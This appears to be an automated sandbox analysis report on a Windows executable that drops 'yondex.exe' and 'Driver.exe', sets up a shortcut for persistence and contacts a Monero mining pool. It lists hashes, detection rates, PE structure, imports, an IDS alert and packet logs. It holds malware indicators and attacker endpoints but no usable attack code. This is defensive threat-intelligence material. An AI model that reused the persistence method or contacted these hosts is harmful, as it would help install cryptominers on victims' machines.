                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe>), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):175
                                                                              Entropy (8bit):5.100464637183347
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQYm5uOt+kiEaKC5SQnPB4L4NIJ4ovstwWDt+kiE2J5xAIkP2dL4ckiWXU:HRYFVmwOwknaZ5lI4NIJlvstwWDwkn2L
                                                                              MD5:09937BA2D25D3D6420DCB7C6EBF54A22
                                                                              SHA1:3F5E1975D708B9140F7FD3463AAF72F8E3600D4F
                                                                              SHA-256:7F9E2451C312E908F14A00A674EC4A7E35E22B75E5E890A4C4979951DAC99E31
                                                                              SHA-512:A188AEDB80A2C6E5DEF6B7A654714380535AD18DB6DCDABA5C9F0498C725778A5B46867BCD430DDD32DCAFE64580D196F893028BE478F83705FB10C3C37E51FF
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe..IconIndex=0..IconFile=C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe\backup (3).ico..

                                                                              C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                              Category:dropped
                                                                              Size (bytes):4141064
                                                                              Entropy (8bit):5.210440836800201
                                                                              Encrypted:false
                                                                              SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
                                                                              MD5:02569A7A91A71133D4A1023BF32AA6F4
                                                                              SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
                                                                              SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                                                                              SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                              • Antivirus: Virustotal, Detection: 68%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: W1nnerFree CS2.exe, Detection: malicious, Browse
                                                                              • Filename: KRZyX0PPRm.exe, Detection: malicious, Browse
                                                                              • Filename: lO188m2RAu.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: 01904399.dat.exe, Detection: malicious, Browse
                                                                              • Filename: Vsob3IooE7.exe, Detection: malicious, Browse
                                                                              • Filename: ruZVRNvu0Y.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: WvWlWr2HC0.exe, Detection: malicious, Browse
                                                                              Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......^.........."...........k.....N2.........@.............................P........?... ..................................................0..P....@..../...W.......>..:...........................................................0...............................MPRESS1. ...............................MPRESS2.....0...........................rsrc...../..@..../.................@..............................................................v2.19..L...H...(.@.......H.......H.....`..f.@....H....O..H..(..0...&......*.....4%. 0.h. <...W..3.3.A...(.....1(.....0 ...0@.......`..N..Q.......w.....3.H...]K..X.ev.u. [.? L._.k\...........G..q\....Q..@. ......_0...+.........!.8..X0.W....t.".I.%. .. .............~.....~....S.~Cp.W:~..................O.A ...p\........L..`..O..........3.i.e...lA..A.....H...I;..|.....O=.p....-..........3..K/.. ~.@.Q0G.."...Q......)..(..".!......@..P.)...%O.H.1......X0......G.X.XP....^Q..5|^2.E

                                                                              C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4157440
                                                                              Entropy (8bit):5.213682809026485
                                                                              Encrypted:false
                                                                              SSDEEP:49152:GBNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3:GnzP88fBsnZTgOtqB3m1RC3
                                                                              MD5:BD2413C32E34D0031F7881D51AE731FF
                                                                              SHA1:8771733C460F22ADC0E1865F0B3F2AC19E9C1001
                                                                              SHA-256:277E5A809506398685FE20BA674B7F3F75B2E04A34C2B150A84088B266138894
                                                                              SHA-512:612C8B9F86308B13342CEF00B9166084BF36F44ADDD139A0123F84CF9711FB2F03E15E4A0B3D95A6DEAAFB60BCA1CC1436514B2B96F4AAF18B094534C94974CF
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Virustotal, Detection: 67%, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....uf..............0..f?.........z.?.. ....?...@.. ........................?...........`.................................(.?.O.....?.......................?.......?.............................................. ............... ..H............text....d?.. ...f?................. ..`.rsrc.........?......h?.............@..@.reloc........?......n?.............@..B................\.?.....H........4...............R...0?..........................................0..8........s.......s........o....o......o....(....&....,..o......*........%,.......0..L..........(......(....o......t&...r...po......o....o....s....o .......&........+..*........>?.......0...........~....r...p(....(!...(......,...%..|.o"......i.+............8................,...%..;.o".........r...po#...-.r...p+.r...p..................+...%....%.r...p.%....%.r...p.%....($.......&......X.....X......i?p..

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):7.892544397980614
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:h2UFp4aCRq.exe
                                                                              File size:5'061'451 bytes
                                                                              MD5:1fecbc51b5620e578c48a12ebeb19bc2
                                                                              SHA1:94fe551f4fb3ff76a0be99a962dc20fc2656453e
                                                                              SHA256:9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
                                                                              SHA512:ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7
                                                                              SSDEEP:98304:6qwWqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMg:6qwWqw0v7DnZu5NnobnDtl4TjZ8X1/Qf
                                                                              TLSH:EB361259E7A508F8E0B7E138D9539419F3F93C4D07604A8F63A6816A2F673D0DE3A712
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\

                                                                              File Icon

                                                                              Icon Hash:90cececece8e8eb0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x140032ee0
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:2
                                                                              File Version Major:5
                                                                              File Version Minor:2
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:2
                                                                              Import Hash:b1c5b1beabd90d9fdabd1df0779ea832

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              call 00007F47B53D1FB8h
                                                                              dec eax
                                                                              add esp, 28h
                                                                              jmp 00007F47B53D194Fh
                                                                              int3
                                                                              int3
                                                                              dec eax
                                                                              mov eax, esp
                                                                              dec eax
                                                                              mov dword ptr [eax+08h], ebx
                                                                              dec eax
                                                                              mov dword ptr [eax+10h], ebp
                                                                              dec eax
                                                                              mov dword ptr [eax+18h], esi
                                                                              dec eax
                                                                              mov dword ptr [eax+20h], edi
                                                                              inc ecx
                                                                              push esi
                                                                              dec eax
                                                                              sub esp, 20h
                                                                              dec ebp
                                                                              mov edx, dword ptr [ecx+38h]
                                                                              dec eax
                                                                              mov esi, edx
                                                                              dec ebp
                                                                              mov esi, eax
                                                                              dec eax
                                                                              mov ebp, ecx
                                                                              dec ecx
                                                                              mov edx, ecx
                                                                              dec eax
                                                                              mov ecx, esi
                                                                              dec ecx
                                                                              mov edi, ecx
                                                                              inc ecx
                                                                              mov ebx, dword ptr [edx]
                                                                              dec eax
                                                                              shl ebx, 04h
                                                                              dec ecx
                                                                              add ebx, edx
                                                                              dec esp
                                                                              lea eax, dword ptr [ebx+04h]
                                                                              call 00007F47B53D0DD3h
                                                                              mov eax, dword ptr [ebp+04h]
                                                                              and al, 66h
                                                                              neg al
                                                                              mov eax, 00000001h
                                                                              sbb edx, edx
                                                                              neg edx
                                                                              add edx, eax
                                                                              test dword ptr [ebx+04h], edx
                                                                              je 00007F47B53D1AE3h
                                                                              dec esp
                                                                              mov ecx, edi
                                                                              dec ebp
                                                                              mov eax, esi
                                                                              dec eax
                                                                              mov edx, esi
                                                                              dec eax
                                                                              mov ecx, ebp
                                                                              call 00007F47B53D3AF7h
                                                                              dec eax
                                                                              mov ebx, dword ptr [esp+30h]
                                                                              dec eax
                                                                              mov ebp, dword ptr [esp+38h]
                                                                              dec eax
                                                                              mov esi, dword ptr [esp+40h]
                                                                              dec eax
                                                                              mov edi, dword ptr [esp+48h]
                                                                              dec eax
                                                                              add esp, 20h
                                                                              inc ecx
                                                                              pop esi
                                                                              ret
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              dec eax
                                                                              sub esp, 48h
                                                                              dec eax
                                                                              lea ecx, dword ptr [esp+20h]
                                                                              call 00007F47B53C0363h
                                                                              dec eax
                                                                              lea edx, dword ptr [00025747h]
                                                                              dec eax
                                                                              lea ecx, dword ptr [esp+20h]
                                                                              call 00007F47B53D2BB2h
                                                                              int3
                                                                              jmp 00007F47B53D8D94h
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xff7c.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000x970.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x700000xff7c0x100007cc0e4178407044344713ed68f887c23False0.2468109130859375data5.044029509615392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x800000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              PNG0x706a40xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                              PNG0x711ec0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                              RT_ICON0x727980x8dbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8142920158800176
                                                                              RT_ICON0x730740x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.029168634860651865
                                                                              RT_ICON0x7729c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.047925311203319505
                                                                              RT_ICON0x798440x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 00.05798816568047337
                                                                              RT_ICON0x7b2ac0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.06543151969981238
                                                                              RT_ICON0x7c3540x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.10327868852459017
                                                                              RT_ICON0x7ccdc0x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 00.12732558139534883
                                                                              RT_ICON0x7d3940x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.10815602836879433
                                                                              RT_DIALOG0x7d7fc0x2badata0.5286532951289399
                                                                              RT_DIALOG0x7dab80x13adata0.6560509554140127
                                                                              RT_DIALOG0x7dbf40xf2data0.71900826446281
                                                                              RT_DIALOG0x7dce80x14adata0.6
                                                                              RT_DIALOG0x7de340x314data0.47588832487309646
                                                                              RT_DIALOG0x7e1480x24adata0.6279863481228669
                                                                              RT_STRING0x7e3940x1fcdata0.421259842519685
                                                                              RT_STRING0x7e5900x246data0.41924398625429554
                                                                              RT_STRING0x7e7d80x1a6data0.514218009478673
                                                                              RT_STRING0x7e9800xdcdata0.65
                                                                              RT_STRING0x7ea5c0x470data0.3873239436619718
                                                                              RT_STRING0x7eecc0x164data0.5056179775280899
                                                                              RT_STRING0x7f0300x110data0.5772058823529411
                                                                              RT_STRING0x7f1400x158data0.4563953488372093
                                                                              RT_STRING0x7f2980xe8data0.5948275862068966
                                                                              RT_STRING0x7f3800x1c6data0.5242290748898678
                                                                              RT_STRING0x7f5480x268data0.4837662337662338
                                                                              RT_GROUP_ICON0x7f7b00x76data0.7457627118644068
                                                                              RT_MANIFEST0x7f8280x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                              OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                              gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              06/23/24-11:31:12.198589UDP2047928ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com)4969853192.168.2.41.1.1.1

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 23, 2024 11:31:10.837541103 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:10.837570906 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:10.837639093 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:10.846098900 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:10.846113920 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:11.586462021 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:11.586556911 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:11.591223955 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:11.591231108 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:11.591629982 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:11.641258001 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:11.671781063 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:11.716499090 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:12.214787006 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:12.219731092 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:12.219937086 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:12.220063925 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:12.224550009 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:12.224630117 CEST4434973192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:12.224831104 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:12.224885941 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:12.233170986 CEST49731443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:12.237163067 CEST49733443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:12.237186909 CEST4434973392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:12.237346888 CEST49733443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:12.237759113 CEST49733443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:12.237772942 CEST4434973392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:12.866239071 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:12.922533989 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:13.029061079 CEST4434973392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:13.032350063 CEST49733443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:13.032371044 CEST4434973392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:13.376065016 CEST4434973392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:13.376600981 CEST4434973392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:13.376682997 CEST49733443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:13.377080917 CEST49733443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:13.642416000 CEST49734443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:13.642447948 CEST4434973492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:13.642651081 CEST49734443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:13.642790079 CEST49734443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:13.642801046 CEST4434973492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.424688101 CEST4434973492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.426592112 CEST49734443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.426606894 CEST4434973492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.768882036 CEST4434973492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.768949986 CEST4434973492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.769102097 CEST49734443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.769655943 CEST49734443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.770713091 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.770801067 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:14.770915985 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.771174908 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:14.771207094 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.492588043 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.494374037 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:15.494426966 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.842303038 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.842468023 CEST4434973592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:15.842560053 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:15.842878103 CEST49735443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175148964 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175249100 CEST4434973692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:16.175340891 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175611019 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:16.175643921 CEST4434973692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:16.207253933 CEST333349732141.94.96.144192.168.2.4
                                                                              Jun 23, 2024 11:31:16.250643969 CEST497323333192.168.2.4141.94.96.144
                                                                              Jun 23, 2024 11:31:16.880925894 CEST4434973692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:17.063190937 CEST49736443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.260010004 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.260045052 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:20.260135889 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.265114069 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:20.265130043 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.084431887 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.084530115 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.086519957 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.086529970 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.086874962 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.152177095 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.196511030 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.433937073 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.434119940 CEST4434973792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.434195042 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.437335968 CEST49737443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475305080 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475337029 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:21.475410938 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475771904 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:21.475786924 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.263181925 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.265476942 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.265511990 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.604455948 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.604667902 CEST4434973892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.604861021 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.605263948 CEST49738443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862143993 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862229109 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:22.862313032 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862709999 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:22.862747908 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.644334078 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.645922899 CEST49739443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:31:23.645986080 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.986260891 CEST4434973992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:31:23.986330986 CEST4434973992.53.96.121192.168.2.4
